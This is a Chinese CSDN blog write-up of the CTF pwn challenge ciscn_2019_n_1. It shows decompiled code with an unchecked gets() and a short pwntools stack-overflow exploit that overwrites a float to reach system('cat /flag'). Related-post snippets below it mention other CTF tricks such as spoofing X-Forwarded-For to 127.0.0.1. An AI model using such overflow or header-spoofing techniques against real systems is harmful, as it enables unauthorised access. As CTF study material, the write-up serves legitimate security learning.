pwnthebox pwn ciscn_2019_n_1 wp

最新推荐文章于 2022-11-29 12:38:33 发布
最新推荐文章于 2022-11-29 12:38:33 发布
阅读量437 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49436541/article/details/123468663
版权

解题思路

程序内容
Let's guess the number.
11.28125
Its value should be 11.28125

让你猜数字,猜对了也不让你过

保护
[*] '/root/桌面/ciscn_2019_n_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

64位正常保护

IDA
main
int func()
{
  int result; // eax
  char v1; // [rsp+0h] [rbp-30h]
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(&v1);
  if ( v2 == 11.28125 )
    result = system("cat /flag");
  else
    result = puts("Its value should be 11.28125");
  return result;
}

进入IDA后可以看出来为什么无法通过了,因为我们是输入到了v1里面,但要求是v2=11.28125,同时v1是gets无限溢出,所以可以溢出到v2改成11.28125

EXP

from pwn import *
#io =remote("redirect.do-not-trust.hacking.run",10473)
io=process('./ciscn_2019_n_1')
payload=(b'a'*(0x30-4))+p32(0x41348000)   //float是占4个字节,p32也是4位,所以64位程序偶尔也可以用一下p32
io.sendafter("number.\n",payload)
io.sendline(payload)
io.interactive()
久而不念
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PwnTheBox(web篇)---ezphp
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-08 718
文章目录PwnTheBox(web篇)---ezphp题目题解 PwnTheBox(web篇)—ezphp 题目 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
pwnbox:有关如何创建自己的Pwnbox(最初由HTB创建)的说明
05-10
Pwnbox 对于使用Kali的用户,我在底部添加了一些步骤以在2020.3中获得新的zsh终端,以显示您的服务器/ IP 是否想复制Hack Box自己的Pwnbox? 请遵循以下指南! 这应该为您提供Hack The Box使用的pwnbox的“外观”。 此处显示的所有内容都可以在您自己的Parrot OS中完成,无论是VM还是主OS。 但是,我建议您研究每个命令的功能,执行的位置以及如何根据自己的喜好自定义它。 对我来说,每当我进入Parrot机器时,它就会带给我有趣的hackthebox徽标。 继续,自己做吧! █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
Pwn The Box——easysql
龙狼刺的博客
08-14 866
easysql。
PwnTheBox pwn题学习笔记
m0_68381884的博客
03-21 489
tutorial1 我们拿到手一个文件后使用Ubuntu,用file来查看一下文件格式。 文件为64-bit,我们打开IDA64,并将文件拖进去。 checksec命令可以用来查看该文件有哪些保护措施。 接下来是IDA反编译之后的伪c代码 ,然后查看mijie -1162167622转化成16进制后为0xBABABABA 当buf的值为0xBABABABA时,函数会跳转到backdoor函数 我们双击backdoor可以得到 接下来写exploit from pw..
PwnTheBox 刷题记录crypto篇
一颗小白菜的博客
08-29 500
首先定义一个函数,遍历str里面的字符,当字符的ascii值在给定范围内时就加上key再模26(97-122为大小写英文字符),key和str1未知,str2是str1加密后的结果,flag为str1MD5加密后的结果,并给了flag的部分字符。凯撒密码用密钥23加密后再base64解密得到flag(看wp才知道,这里可以用爆破,flagbase64加密后的内容为ZmxhZw==)再将得到的字符串synt{efnZ0erQ33crE}进行凯撒密码爆破得到flag。再base64解密,得到乱码。...
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 2939
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
PWN概论
m0_52249553的博客
05-06 6397
什么是pwn pwn是ctf解题赛中的一个题目类别,它在黑客俚语中代表着攻破,获取权限,由“own”这个词引申而来。在CTF比赛中它代表着溢出类的题目,常见的类型有整数溢出、栈溢出、堆溢出等。主要考查参赛选手对漏洞的利用能力。 学习pwn的知识储备 反汇编工具 在比赛中我们会拿到一个二进制文件(由c文件编译而来),我们要找出这个可执行文件的漏洞,但二进制文件是由0和1的机器码组成,正常人是直接无法看懂里面的内容的,这时我们需要利用反编译工具将这个二进制文件反编译为我们能看懂的语言(汇编语言或者c语言
PwnTheBox
硫酸超的博客
11-30 922
靶场地址 右键查看源代码 <html> <head> <title>Welcome to PwnTheBox</title> <meta charset="utf-8"> </head> <body> <h3 align="center">欢迎来到PwnTheBox大学</h3> <p>PwnTheBox大学(PwnTheBox University)简称PTB,建校于5YWs5Y
pwnthebox 网页读取器
weixin_45461235的博客
08-13 301
ctfpwnbox 网页读取器
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
pwn the box 管理员本地访问
m0_49271388的博客
05-17 112
管理员本地访问 题目信息 本地访问 BP抓包 请求头加上client-ip: 127.0.0.1 或 X-Forwarded-For: 127.0.0.1 X-Forwarded-For 是一个 HTTP 扩展头部,用来表示 HTTP 请求端真实 IP
PwnTheBox,Web:对方不想和你说话,并向你扔了一段代码
Pai_Space
06-05 349
逻辑漏洞
[BJDCTF2020]RSA ==>低加密指数攻击
LYJ20010728的博客
12-01 763
题目地址 task.py内容如下: from Crypto.Util.number import getPrime,bytes_to_long flag=open("flag","rb").read() p=getPrime(1024) q=getPrime(1024) assert(e<100000) n=p*q m=bytes_to_long(flag) c=pow(m,e,n) print c,n print pow(294,e,n) p=getPrime(1024) n=p*q m=by
Web安全--反序列化漏洞详解(php篇)
bobo_milk的博客
11-29 1063
反序列化
[RoarCTF2019]RSA
qq_61774705的博客
05-15 677
1.题目 # A=(((y%x)**5)%(x%y))**2019+y**316+(y+1)/x # p=next_prime(z*x*y) # q=next_prime(z) # A = 26833491826787145242474695127934760098610147810049249054841274803081613777681928680615618865770486464323821289608814874634274141761144868858306939594049897432
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值